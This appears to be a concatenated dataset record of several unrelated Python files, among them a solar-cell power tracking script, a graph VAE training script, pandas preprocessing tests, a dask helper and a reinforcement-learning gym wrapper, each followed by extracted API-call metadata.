data = keithley2400.query(':MEAS:CURR?') # Measure the current
data = data.split(',')
data = [float(item) for item in data]
Vs.append(data[0])
Is.append(data[1])
Js.append(data[1] * 1000 / A)
Ps.append(data[0] * data[1])
PCEs.append(np.absolute(data[0] * data[1] * 1000 / (suns * A)))
t = time.time()
# Open the shutter of the solar simulator
keithley2400.write(':SOUR2:TTL 0')
# Measure at V in the light for t_track
i = len(Vs) - 1
while t - t_start < t_track + 3:
ts.append(t - t_start)
data = keithley2400.query(':MEAS:CURR?') # Measure the current
data = data.split(',')
data = [float(item) for item in data]
Vs.append(data[0])
Is.append(data[1])
Js.append(data[1] * 1000 / A)
Ps.append(data[0] * data[1])
PCEs.append(np.absolute(data[0] * data[1] * 1000 / (suns * A)))
t = time.time()
i += 1
return ts, Vs, Is, Js, Ps, PCEs
# Turn off display
keithley2400.write(':DISP:ENAB 0')
# Manually reset zero reference values
keithley2400.write(':SYST:AZER ONCE')
# Track max power
mppt_results = track_max_power(V_start, t_track)
# Disable output
keithley2400.write('OUTP OFF')
# Close shutter
keithley2400.write(':SOUR2:TTL 1')
# Turn off display
keithley2400.write(':DISP:ENAB 1')
# Format and save the results
np.savetxt(
folderpath + filename,
np.transpose(np.array(mppt_results)),
fmt='%.9f',
delimiter='\t',
newline='\r\n',
header='Time (s)\tV\tI (A)\tJ (mA/cm^2)\tP (W)\tPCE (%)',
comments='')
# Close the visa resource manager
keithley2400.close()
|
[
"numpy.absolute",
"pyvisa.ResourceManager",
"argparse.ArgumentParser",
"time.time",
"numpy.array"
] |
[((366, 456), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Measure and save max power point tracking data"""'}), "(description=\n 'Measure and save max power point tracking data')\n", (389, 456), False, 'import argparse\n'), ((1727, 1747), 'numpy.absolute', 'np.absolute', (['V_start'], {}), '(V_start)\n', (1738, 1747), True, 'import numpy as np\n'), ((1914, 1938), 'pyvisa.ResourceManager', 'pyvisa.ResourceManager', ([], {}), '()\n', (1936, 1938), False, 'import pyvisa\n'), ((3865, 3876), 'time.time', 'time.time', ([], {}), '()\n', (3874, 3876), False, 'import time\n'), ((3885, 3896), 'time.time', 'time.time', ([], {}), '()\n', (3894, 3896), False, 'import time\n'), ((4355, 4366), 'time.time', 'time.time', ([], {}), '()\n', (4364, 4366), False, 'import time\n'), ((4948, 4959), 'time.time', 'time.time', ([], {}), '()\n', (4957, 4959), False, 'import time\n'), ((5457, 5479), 'numpy.array', 'np.array', (['mppt_results'], {}), '(mppt_results)\n', (5465, 5479), True, 'import numpy as np\n'), ((4291, 4341), 'numpy.absolute', 'np.absolute', (['(data[0] * data[1] * 1000 / (suns * A))'], {}), '(data[0] * data[1] * 1000 / (suns * A))\n', (4302, 4341), True, 'import numpy as np\n'), ((4884, 4934), 'numpy.absolute', 'np.absolute', (['(data[0] * data[1] * 1000 / (suns * A))'], {}), '(data[0] * data[1] * 1000 / (suns * A))\n', (4895, 4934), True, 'import numpy as np\n')]
|
from __future__ import division
from __future__ import print_function
from evaluation import get_roc_score, clustering_latent_space
from input_data import load_adj_feature
from kcore import compute_kcore, expand_embedding
from model import *
from optimizer import OptimizerAE, OptimizerVAE
from preprocessing import *
import numpy as np
import os
import scipy.sparse as sp
import tensorflow as tf
import time
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
# tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
flags = tf.app.flags
FLAGS = flags.FLAGS
# Select graph dataset
flags.DEFINE_string('dataset', 'Cross-talk', 'Name of the graph dataset')
# Select machine learning task to perform on graph
flags.DEFINE_string('task', 'link_prediction', 'Name of the learning task')
# Model
flags.DEFINE_string('model', 'linear_vae', 'Name of the model')
# Model parameters
flags.DEFINE_float('dropout', 0., 'Dropout rate (1 - keep probability).')
flags.DEFINE_integer('epochs', 1000, 'Number of epochs in training.')
flags.DEFINE_boolean('features', True, 'Include node features or not in encoder')
flags.DEFINE_float('learning_rate', 0.05, 'Initial learning rate (with Adam)')
flags.DEFINE_integer('hidden', 64, 'Number of units in GCN hidden layer(s).')
flags.DEFINE_integer('dimension', 128, 'Dimension of encoder output, i.e. \
embedding dimension')
# Experimental setup parameters
flags.DEFINE_integer('nb_run', 1, 'Number of model run + test')
flags.DEFINE_float('prop_val', 5., 'Proportion of edges in validation set \
(for Link Prediction task)')
flags.DEFINE_float('prop_test', 10., 'Proportion of edges in test set \
(for Link Prediction task)')
flags.DEFINE_boolean('validation', False, 'Whether to report validation \
results at each epoch (for \
Link Prediction task)')
flags.DEFINE_boolean('verbose', True, 'Whether to print comments details.')
flags.DEFINE_boolean('kcore', False, 'Whether to run k-core decomposition \
and use the framework. False = model \
will be trained on the entire graph')
flags.DEFINE_integer('k', 2, 'Which k-core to use. Higher k => smaller graphs\
and faster (but maybe less accurate) training')
flags.DEFINE_integer('nb_iterations', 10, 'Number of fix point iterations in \
algorithm 2 of IJCAI paper. See \
kcore.py file for details')
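# Illustrative command line (the entry-point filename is an assumption; with
# tf.app.flags every DEFINE_* name above becomes a --flag argument, and the
# values shown simply repeat the defaults):
#   python train.py --dataset=Cross-talk --task=link_prediction \
#       --model=linear_vae --epochs=1000 --learning_rate=0.05 --dimension=128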
# Lists to collect average results
if FLAGS.task == 'link_prediction':
mean_roc = []
mean_ap = []
if FLAGS.kcore:
mean_time_kcore = []
mean_time_train = []
mean_time_expand = []
mean_core_size = []
mean_time = []
# Load graph dataset
if FLAGS.verbose:
print("Loading data...")
if FLAGS.dataset == 'Cross-talk':
adj_init, features_init = load_adj_feature('../Cross-talk/Fegs_1.npy',
'../Cross-talk/Cross-talk_Matrix.txt')
else:
adj_init, features_init = load_data(FLAGS.dataset)
print(type(adj_init), type(features_init))
# The entire training+test process is repeated FLAGS.nb_run times
for i in range(FLAGS.nb_run):
if FLAGS.task == 'link_prediction':
if FLAGS.verbose:
print("Masking test edges...")
# Edge Masking for Link Prediction: compute Train/Validation/Test set
adj, val_edges, val_edges_false, test_edges, test_edges_false = \
mask_test_edges(adj_init, FLAGS.prop_test, FLAGS.prop_val)
elif FLAGS.task == 'node_clustering':
adj_tri = sp.triu(adj_init)
adj = adj_tri + adj_tri.T
else:
raise ValueError('Undefined task!')
# Start computation of running times
t_start = time.time()
# Degeneracy Framework / K-Core Decomposition
if FLAGS.kcore:
if FLAGS.verbose:
print("Starting k-core decomposition of the graph")
# Save adjacency matrix of un-decomposed graph
# (needed to embed nodes that are not in k-core, after GAE training)
adj_orig = adj
# Get the (smaller) adjacency matrix of the k-core subgraph,
# and the corresponding nodes
adj, nodes_kcore = compute_kcore(adj, FLAGS.k)
# Get the (smaller) feature matrix of the nb_core graph
if FLAGS.features:
features = features_init[nodes_kcore, :]
# Flag to compute k-core decomposition's running time
t_core = time.time()
elif FLAGS.features:
features = features_init
# Preprocessing and initialization
if FLAGS.verbose:
print("Preprocessing and Initializing...")
# Compute number of nodes
num_nodes = adj.shape[0]
# If features are not used, replace feature matrix by identity matrix
if not FLAGS.features:
features = sp.identity(adj.shape[0])
# Preprocessing on node features
features = sparse_to_tuple(features)
num_features = features[2][1]
features_nonzero = features[1].shape[0]
# Define placeholders
placeholders = {
'features': tf.sparse_placeholder(tf.float32),
'adj': tf.sparse_placeholder(tf.float32),
'adj_orig': tf.sparse_placeholder(tf.float32),
'dropout': tf.placeholder_with_default(0., shape=())
}
# Create model
model = None
# Linear Graph Variational Autoencoder
model = LinearModelVAE(placeholders, num_features, num_nodes,
features_nonzero)
# Optimizer
pos_weight = float(adj.shape[0] * adj.shape[0] - adj.sum()) / adj.sum()
norm = adj.shape[0] * adj.shape[0] / float((adj.shape[0] * adj.shape[0]
- adj.sum()) * 2)
with tf.name_scope('optimizer'):
        # Optimizer for the Variational Autoencoder
opt = OptimizerVAE(preds=model.reconstructions,
labels=tf.reshape(tf.sparse_tensor_to_dense(placeholders['adj_orig'],
validate_indices=False), [-1]),
model=model,
num_nodes=num_nodes,
pos_weight=pos_weight,
norm=norm)
# Normalization and preprocessing on adjacency matrix
adj_norm = preprocess_graph(adj)
adj_label = sparse_to_tuple(adj + sp.eye(adj.shape[0]))
# Initialize TF session
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# Model training
if FLAGS.verbose:
print("Training...")
for epoch in range(FLAGS.epochs):
# Flag to compute running time for each epoch
t = time.time()
# Construct feed dictionary
feed_dict = construct_feed_dict(adj_norm, adj_label, features,
placeholders)
feed_dict.update({placeholders['dropout']: FLAGS.dropout})
# Weights update
outs = sess.run([opt.opt_op, opt.cost, opt.accuracy],
feed_dict=feed_dict)
# Compute average loss
avg_cost = outs[1]
if FLAGS.verbose:
# Display epoch information
print("Epoch:", '%04d' % (epoch + 1), "train_loss=", "{:.5f}".format(avg_cost),
"time=", "{:.5f}".format(time.time() - t))
# Validation, for Link Prediction
if not FLAGS.kcore and FLAGS.validation and FLAGS.task == 'link_prediction':
feed_dict.update({placeholders['dropout']: 0})
emb = sess.run(model.z_mean, feed_dict=feed_dict)
feed_dict.update({placeholders['dropout']: FLAGS.dropout})
val_roc, val_ap = get_roc_score(val_edges, val_edges_false, emb)
print("val_roc=", "{:.5f}".format(val_roc), "val_ap=", "{:.5f}".format(val_ap))
# Flag to compute Graph AE/VAE training time
t_model = time.time()
# Compute embedding
# Get embedding from model
emb = sess.run(model.z_mean, feed_dict=feed_dict)
# If k-core is used, only part of the nodes from the original
# graph are embedded. The remaining ones are projected in the
# latent space via the expand_embedding heuristic
if FLAGS.kcore:
if FLAGS.verbose:
print("Propagation to remaining nodes...")
# Project remaining nodes in latent space
emb = expand_embedding(adj_orig, emb, nodes_kcore, FLAGS.nb_iterations)
# Compute mean running times for K-Core, GAE Train and Propagation steps
mean_time_expand.append(time.time() - t_model)
mean_time_train.append(t_model - t_core)
mean_time_kcore.append(t_core - t_start)
# Compute mean size of K-Core graph
# Note: size is fixed if task is node clustering, but will vary if
# task is link prediction due to edge masking
mean_core_size.append(len(nodes_kcore))
# Compute mean total running time
mean_time.append(time.time() - t_start)
print(type(emb))
np.save('../Cross-talk/Cross_talk_gcn_features128_FEGS.npy', emb)
# Test model
if FLAGS.verbose:
print("Testing model...")
# Link Prediction: classification edges/non-edges
# Get ROC and AP scores
roc_score, ap_score = get_roc_score(test_edges, test_edges_false, emb)
# Report scores
mean_roc.append(roc_score)
mean_ap.append(ap_score)
###### Report Final Results ######
# Report final results
print("\nTest results for", FLAGS.model,
"model on", FLAGS.dataset, "on", FLAGS.task, "\n",
"___________________________________________________\n")
if FLAGS.task == 'link_prediction':
print("AUC scores\n", mean_roc)
print("Mean AUC score: ", np.mean(mean_roc),
"\nStd of AUC scores: ", np.std(mean_roc), "\n \n")
print("AP scores\n", mean_ap)
print("Mean AP score: ", np.mean(mean_ap),
"\nStd of AP scores: ", np.std(mean_ap), "\n \n")
else:
print("Adjusted MI scores\n", mean_mutual_info)
print("Mean Adjusted MI score: ", np.mean(mean_mutual_info),
"\nStd of Adjusted MI scores: ", np.std(mean_mutual_info), "\n \n")
print("Total Running times\n", mean_time)
print("Mean total running time: ", np.mean(mean_time),
"\nStd of total running time: ", np.std(mean_time), "\n \n")
|
[
"numpy.save",
"kcore.expand_embedding",
"numpy.std",
"tensorflow.global_variables_initializer",
"tensorflow.placeholder_with_default",
"tensorflow.sparse_tensor_to_dense",
"tensorflow.Session",
"kcore.compute_kcore",
"time.time",
"scipy.sparse.triu",
"numpy.mean",
"input_data.load_adj_feature",
"scipy.sparse.identity",
"evaluation.get_roc_score",
"tensorflow.sparse_placeholder",
"tensorflow.name_scope",
"scipy.sparse.eye"
] |
[((3122, 3209), 'input_data.load_adj_feature', 'load_adj_feature', (['"""../Cross-talk/Fegs_1.npy"""', '"""../Cross-talk/Cross-talk_Matrix.txt"""'], {}), "('../Cross-talk/Fegs_1.npy',\n '../Cross-talk/Cross-talk_Matrix.txt')\n", (3138, 3209), False, 'from input_data import load_adj_feature\n'), ((4033, 4044), 'time.time', 'time.time', ([], {}), '()\n', (4042, 4044), False, 'import time\n'), ((6779, 6791), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (6789, 6791), True, 'import tensorflow as tf\n'), ((8279, 8290), 'time.time', 'time.time', ([], {}), '()\n', (8288, 8290), False, 'import time\n'), ((9412, 9477), 'numpy.save', 'np.save', (['"""../Cross-talk/Cross_talk_gcn_features128_FEGS.npy"""', 'emb'], {}), "('../Cross-talk/Cross_talk_gcn_features128_FEGS.npy', emb)\n", (9419, 9477), True, 'import numpy as np\n'), ((9667, 9715), 'evaluation.get_roc_score', 'get_roc_score', (['test_edges', 'test_edges_false', 'emb'], {}), '(test_edges, test_edges_false, emb)\n', (9680, 9715), False, 'from evaluation import get_roc_score, clustering_latent_space\n'), ((10650, 10668), 'numpy.mean', 'np.mean', (['mean_time'], {}), '(mean_time)\n', (10657, 10668), True, 'import numpy as np\n'), ((10710, 10727), 'numpy.std', 'np.std', (['mean_time'], {}), '(mean_time)\n', (10716, 10727), True, 'import numpy as np\n'), ((4506, 4533), 'kcore.compute_kcore', 'compute_kcore', (['adj', 'FLAGS.k'], {}), '(adj, FLAGS.k)\n', (4519, 4533), False, 'from kcore import compute_kcore, expand_embedding\n'), ((4762, 4773), 'time.time', 'time.time', ([], {}), '()\n', (4771, 4773), False, 'import time\n'), ((5135, 5160), 'scipy.sparse.identity', 'sp.identity', (['adj.shape[0]'], {}), '(adj.shape[0])\n', (5146, 5160), True, 'import scipy.sparse as sp\n'), ((5393, 5426), 'tensorflow.sparse_placeholder', 'tf.sparse_placeholder', (['tf.float32'], {}), '(tf.float32)\n', (5414, 5426), True, 'import tensorflow as tf\n'), ((5444, 5477), 'tensorflow.sparse_placeholder', 'tf.sparse_placeholder', (['tf.float32'], {}), '(tf.float32)\n', (5465, 5477), True, 'import tensorflow as tf\n'), ((5500, 5533), 'tensorflow.sparse_placeholder', 'tf.sparse_placeholder', (['tf.float32'], {}), '(tf.float32)\n', (5521, 5533), True, 'import tensorflow as tf\n'), ((5555, 5597), 'tensorflow.placeholder_with_default', 'tf.placeholder_with_default', (['(0.0)'], {'shape': '()'}), '(0.0, shape=())\n', (5582, 5597), True, 'import tensorflow as tf\n'), ((6055, 6081), 'tensorflow.name_scope', 'tf.name_scope', (['"""optimizer"""'], {}), "('optimizer')\n", (6068, 6081), True, 'import tensorflow as tf\n'), ((6806, 6839), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (6837, 6839), True, 'import tensorflow as tf\n'), ((7027, 7038), 'time.time', 'time.time', ([], {}), '()\n', (7036, 7038), False, 'import time\n'), ((8768, 8833), 'kcore.expand_embedding', 'expand_embedding', (['adj_orig', 'emb', 'nodes_kcore', 'FLAGS.nb_iterations'], {}), '(adj_orig, emb, nodes_kcore, FLAGS.nb_iterations)\n', (8784, 8833), False, 'from kcore import compute_kcore, expand_embedding\n'), ((10134, 10151), 'numpy.mean', 'np.mean', (['mean_roc'], {}), '(mean_roc)\n', (10141, 10151), True, 'import numpy as np\n'), ((10189, 10205), 'numpy.std', 'np.std', (['mean_roc'], {}), '(mean_roc)\n', (10195, 10205), True, 'import numpy as np\n'), ((10283, 10299), 'numpy.mean', 'np.mean', (['mean_ap'], {}), '(mean_ap)\n', (10290, 10299), True, 'import numpy as np\n'), ((10336, 10351), 'numpy.std', 'np.std', (['mean_ap'], {}), '(mean_ap)\n', (10342, 
10351), True, 'import numpy as np\n'), ((10463, 10488), 'numpy.mean', 'np.mean', (['mean_mutual_info'], {}), '(mean_mutual_info)\n', (10470, 10488), True, 'import numpy as np\n'), ((10534, 10558), 'numpy.std', 'np.std', (['mean_mutual_info'], {}), '(mean_mutual_info)\n', (10540, 10558), True, 'import numpy as np\n'), ((3865, 3882), 'scipy.sparse.triu', 'sp.triu', (['adj_init'], {}), '(adj_init)\n', (3872, 3882), True, 'import scipy.sparse as sp\n'), ((6714, 6734), 'scipy.sparse.eye', 'sp.eye', (['adj.shape[0]'], {}), '(adj.shape[0])\n', (6720, 6734), True, 'import scipy.sparse as sp\n'), ((9360, 9371), 'time.time', 'time.time', ([], {}), '()\n', (9369, 9371), False, 'import time\n'), ((8068, 8114), 'evaluation.get_roc_score', 'get_roc_score', (['val_edges', 'val_edges_false', 'emb'], {}), '(val_edges, val_edges_false, emb)\n', (8081, 8114), False, 'from evaluation import get_roc_score, clustering_latent_space\n'), ((8949, 8960), 'time.time', 'time.time', ([], {}), '()\n', (8958, 8960), False, 'import time\n'), ((6240, 6315), 'tensorflow.sparse_tensor_to_dense', 'tf.sparse_tensor_to_dense', (["placeholders['adj_orig']"], {'validate_indices': '(False)'}), "(placeholders['adj_orig'], validate_indices=False)\n", (6265, 6315), True, 'import tensorflow as tf\n'), ((7671, 7682), 'time.time', 'time.time', ([], {}), '()\n', (7680, 7682), False, 'import time\n')]
|
import numpy as np
import pandas as pd
from dstk.preprocessing import (onehot_encode,
mark_binary,
nan_to_binary,
num_to_str)
# Create test data
df = pd.DataFrame()
df['numeric1'] = [0, 1, 0, 0, 1, 1]
df['numeric2'] = [1.0, 3.4, 5.4, 2.3, 3.1, 4.1]
df['numericNaN'] = [1, 2, 3, None, 3, None]
df['cat1'] = ['a', 'a', 'b', 'c', 'c', 'a']
df['catNaN'] = ['A', 'B', None, None, 'B', 'C']
# Test for num_to_str function
def test_numtostr():
# Test for converting column type to object
test = num_to_str(df, ['numeric1'])
assert test['numeric1'].dtype == 'O'
def test_numtostr_inplace():
# Test for converting column to object in place
df2 = df.copy()
num_to_str(df2, ['numeric1'], inplace=True)
assert df2['numeric1'].dtype == 'O'
# Tests for nan_to_binary function
def test_nantobinary_inplaceTrue():
# Test for converting dataframe in place
df2 = df.copy()
nan_to_binary(df2, ['numericNaN'], inplace=True)
assert df2['binary#numericNaN'].tolist() == [0, 0, 0, 1, 0, 1]
def test_nantobinary_featureselect():
# Test for converting specified features
test = nan_to_binary(df, ['numericNaN'])
assert test['binary#numericNaN'].tolist() == [0, 0, 0, 1, 0, 1]
def test_nantobinary_auto():
# Test for auto converting columns with NaN > threshold
test = nan_to_binary(df)
assert test['binary#catNaN'].tolist() == [0, 0, 1, 1, 0, 0]
def test_nantobinary_threshold():
# Test for auto converting columns with NaN > specified threshold
test = nan_to_binary(df, threshold=0.5, inplace=False)
assert test.loc[2, 'catNaN'] == None
# Tests for markbinary function
def test_markbinary_inplaceFalse():
# Test for not transforming df in place
test = mark_binary(df, inplace=False)
assert test.columns.tolist()[0] == 'binary#numeric1'
def test_markbinary_inplaceTrue():
# Test for transforming df in place
df2 = df.copy()
mark_binary(df2, inplace=True)
assert df2.columns.tolist()[0] == 'binary#numeric1'
def test_markbinary_inplaceTrue_selectfeature():
# Test for selecting specific features to mark
df2 = df.copy()
mark_binary(df2, ['numeric1'], inplace=True)
assert df2.columns.tolist()[0] == 'binary#numeric1'
# Tests for onehotencode wrapper
def test_onehot_checkprefix():
# Test whether prefixes are created correctly
test = onehot_encode(df)
assert test.columns.tolist() == ['numeric1',
'numeric2',
'numericNaN',
'binary#cat1_b',
'binary#cat1_c',
'binary#catNaN_B',
'binary#catNaN_C',
'binary#catNaN_nan']
def test_onehot_selectfeature():
# Test whether subselection of features is correct
test = onehot_encode(df, features=['cat1'])
assert test.columns.tolist() == ['numeric1',
'numeric2',
'numericNaN',
'catNaN',
'binary#cat1_b',
'binary#cat1_c']
def test_onehot_retainNaNs():
# Test whether nans are retained
test = onehot_encode(df, impute='retain')
assert np.isnan(test['binary#catNaN_B']).tolist() == [
False, False, True, True, False, False]
def test_onehot_modeimputeNaNs():
# Test mode imputing NaNs
test = onehot_encode(df, impute='mode')
assert test['binary#catNaN_B'].tolist() == [0, 1, 1, 1, 1, 0]
def test_onehot_trackNaNs():
# Test whether nans are tracked in separate column
test = onehot_encode(df)
assert test['binary#catNaN_nan'].tolist() == [0, 0, 1, 1, 0, 0]
def test_onehot_drop_zerovar():
# Test whether zero variance columns are dropped
df['cat2'] = ['a', 'a', 'a', 'a', 'a', 'a']
test = onehot_encode(df)
assert test.columns.tolist() == ['numeric1',
'numeric2',
'numericNaN',
'binary#cat1_b',
'binary#cat1_c',
'binary#catNaN_B',
'binary#catNaN_C',
'binary#catNaN_nan']
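# Behaviour pinned down by the assertions above (inferred from these tests, not
# from separate dstk documentation): onehot_encode prefixes every dummy column
# with "binary#", drops the first level of each categorical (only cat1_b and
# cat1_c remain), can retain, mode-impute or track NaNs via a *_nan indicator
# column, and removes zero-variance columns such as cat2.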
|
[
"pandas.DataFrame",
"dstk.preprocessing.nan_to_binary",
"numpy.isnan",
"dstk.preprocessing.onehot_encode",
"dstk.preprocessing.num_to_str",
"dstk.preprocessing.mark_binary"
] |
[((248, 262), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (260, 262), True, 'import pandas as pd\n'), ((597, 625), 'dstk.preprocessing.num_to_str', 'num_to_str', (['df', "['numeric1']"], {}), "(df, ['numeric1'])\n", (607, 625), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((774, 817), 'dstk.preprocessing.num_to_str', 'num_to_str', (['df2', "['numeric1']"], {'inplace': '(True)'}), "(df2, ['numeric1'], inplace=True)\n", (784, 817), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1001, 1049), 'dstk.preprocessing.nan_to_binary', 'nan_to_binary', (['df2', "['numericNaN']"], {'inplace': '(True)'}), "(df2, ['numericNaN'], inplace=True)\n", (1014, 1049), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1213, 1246), 'dstk.preprocessing.nan_to_binary', 'nan_to_binary', (['df', "['numericNaN']"], {}), "(df, ['numericNaN'])\n", (1226, 1246), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1417, 1434), 'dstk.preprocessing.nan_to_binary', 'nan_to_binary', (['df'], {}), '(df)\n', (1430, 1434), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1616, 1663), 'dstk.preprocessing.nan_to_binary', 'nan_to_binary', (['df'], {'threshold': '(0.5)', 'inplace': '(False)'}), '(df, threshold=0.5, inplace=False)\n', (1629, 1663), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((1831, 1861), 'dstk.preprocessing.mark_binary', 'mark_binary', (['df'], {'inplace': '(False)'}), '(df, inplace=False)\n', (1842, 1861), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((2020, 2050), 'dstk.preprocessing.mark_binary', 'mark_binary', (['df2'], {'inplace': '(True)'}), '(df2, inplace=True)\n', (2031, 2050), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((2234, 2278), 'dstk.preprocessing.mark_binary', 'mark_binary', (['df2', "['numeric1']"], {'inplace': '(True)'}), "(df2, ['numeric1'], inplace=True)\n", (2245, 2278), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((2463, 2480), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {}), '(df)\n', (2476, 2480), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3009, 3045), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {'features': "['cat1']"}), "(df, features=['cat1'])\n", (3022, 3045), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3430, 3464), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {'impute': '"""retain"""'}), "(df, impute='retain')\n", (3443, 3464), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3649, 3681), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {'impute': '"""mode"""'}), "(df, impute='mode')\n", (3662, 3681), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3845, 3862), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {}), '(df)\n', (3858, 3862), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((4077, 4094), 'dstk.preprocessing.onehot_encode', 'onehot_encode', (['df'], {}), '(df)\n', 
(4090, 4094), False, 'from dstk.preprocessing import onehot_encode, mark_binary, nan_to_binary, num_to_str\n'), ((3476, 3509), 'numpy.isnan', 'np.isnan', (["test['binary#catNaN_B']"], {}), "(test['binary#catNaN_B'])\n", (3484, 3509), True, 'import numpy as np\n')]
|
"""Utilities for multiprocessing."""
from contextlib import contextmanager
import logging
import time
from dask.distributed import Client, LocalCluster, progress
from dask_jobqueue import PBSCluster
import numpy as np
_logger = logging.getLogger(__name__)
def map_function(function, function_args, pbs=False, **cluster_kwargs):
"""Parallize `function` over `function_args` across available CPUs.
Utilizes dask.distributed.Client.map which follows the implementation of built-in
`map`. See https://docs.python.org/3/library/functions.html#map and
https://distributed.dask.org/en/latest/client.html.
Examples
--------
```
def add(x, y):
return x + y
xs = [1, 2, 3, 4]
ys = [11, 12, 13, 14]
map_function(add, [xs, ys]) => [12, 14, 16, 18]
```
Parameters
----------
function : function | method
function_args : list
If `function` takes multiple args, follow implementation of `map`. Namely, if
f(x1, x2) => y, then `function_args` should be `[all_x1, all_x2]`.
pbs : bool, optional
        Whether or not to create a PBS job over whose cluster to parallelize,
        by default False.
Returns
-------
list
"""
_logger.info(
"Running %s in parallel with args of shape %s",
function.__name__,
np.shape(function_args),
)
with dask_client(pbs=pbs, **cluster_kwargs) as client:
if len(np.shape(function_args)) == 1:
function_args = [function_args]
futures = client.map(function, *function_args)
progress(futures)
return_values = client.gather(futures)
return return_values
@contextmanager
def dask_client(pbs=False, **cluster_kwargs):
"""Context manager surrounding a dask client. Handles closing upon completion.
Examples
--------
```
with dask_client() as client:
client.do_something()
```
Parameters
----------
pbs: bool, optional
Whether or not dask should submit a PBS job over whose cluster to operate.
**cluster_kwargs:
Arguments to either `PBSCluster` or `LocalCluster` which are pretty much the
        same. Some useful arguments include:
- n_workers
- cores
- interface
- memory
- walltime
"""
if pbs:
cluster = PBSCluster(**cluster_kwargs)
if "n_workers" not in cluster_kwargs:
cluster.scale(1)
else:
cluster = LocalCluster(processes=False, **cluster_kwargs)
client = Client(cluster)
client.wait_for_workers(n_workers=1)
time.sleep(5)
try:
_logger.info("Dask Cluster: %s\nDask Client: %s", cluster, client)
yield client
finally:
client.close()
cluster.close()
_logger.info("Closed client and cluster")
def flatten_array(arr):
"""Flatten an array by 1 dimension."""
shape = np.array(arr).shape
if len(shape) == 1:
return arr
return [item for list_1d in arr for item in list_1d]
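if __name__ == "__main__":
    # Minimal usage sketch (illustrative only): parallelize a toy function over
    # the default local cluster. For a PBS-managed cluster, pass pbs=True plus
    # PBSCluster keyword arguments such as cores, memory and walltime, as noted
    # in the dask_client docstring above.
    def square(x):
        return x * x
    print(map_function(square, [1, 2, 3, 4]))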
|
[
"dask.distributed.Client",
"dask.distributed.LocalCluster",
"time.sleep",
"numpy.shape",
"dask.distributed.progress",
"numpy.array",
"dask_jobqueue.PBSCluster",
"logging.getLogger"
] |
[((230, 257), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (247, 257), False, 'import logging\n'), ((2557, 2572), 'dask.distributed.Client', 'Client', (['cluster'], {}), '(cluster)\n', (2563, 2572), False, 'from dask.distributed import Client, LocalCluster, progress\n'), ((2619, 2632), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2629, 2632), False, 'import time\n'), ((1333, 1356), 'numpy.shape', 'np.shape', (['function_args'], {}), '(function_args)\n', (1341, 1356), True, 'import numpy as np\n'), ((1577, 1594), 'dask.distributed.progress', 'progress', (['futures'], {}), '(futures)\n', (1585, 1594), False, 'from dask.distributed import Client, LocalCluster, progress\n'), ((2363, 2391), 'dask_jobqueue.PBSCluster', 'PBSCluster', ([], {}), '(**cluster_kwargs)\n', (2373, 2391), False, 'from dask_jobqueue import PBSCluster\n'), ((2495, 2542), 'dask.distributed.LocalCluster', 'LocalCluster', ([], {'processes': '(False)'}), '(processes=False, **cluster_kwargs)\n', (2507, 2542), False, 'from dask.distributed import Client, LocalCluster, progress\n'), ((2930, 2943), 'numpy.array', 'np.array', (['arr'], {}), '(arr)\n', (2938, 2943), True, 'import numpy as np\n'), ((1438, 1461), 'numpy.shape', 'np.shape', (['function_args'], {}), '(function_args)\n', (1446, 1461), True, 'import numpy as np\n')]
|
import numpy as np
import gym
import gym_carsim
from gym import spaces
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten
from keras.optimizers import Adam
from rl.agents.dqn import DQNAgent
from rl.policy import BoltzmannQPolicy
from rl.memory import SequentialMemory
ENV_NAME = 'carsim-v0'
class WrapThreeFrames(gym.Wrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = spaces.Box(low=0.0, high=1.0, shape=(9,))
self.past_obs = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
def shift_past_obs(self, new_obs):
self.past_obs = self.past_obs[3:]+new_obs
return self.past_obs
def reset(self):
obs = self.env.reset()
return self.shift_past_obs(obs)
def step(self, action):
obs, reward, done, info = self.env.step(action)
return self.shift_past_obs(obs), reward, done, info
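# The wrapper above assumes the carsim environment emits 3 sensor values per
# step: shift_past_obs keeps a sliding window of the last three observations,
# e.g. (illustrative values) past_obs = [a1, a2, a3, b1, b2, b3, c1, c2, c3]
# plus a new observation [d1, d2, d3] yields [b1, b2, b3, c1, c2, c3, d1, d2, d3].
# Because the wrapper does the frame stacking itself, the SequentialMemory
# below can keep window_length=1.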
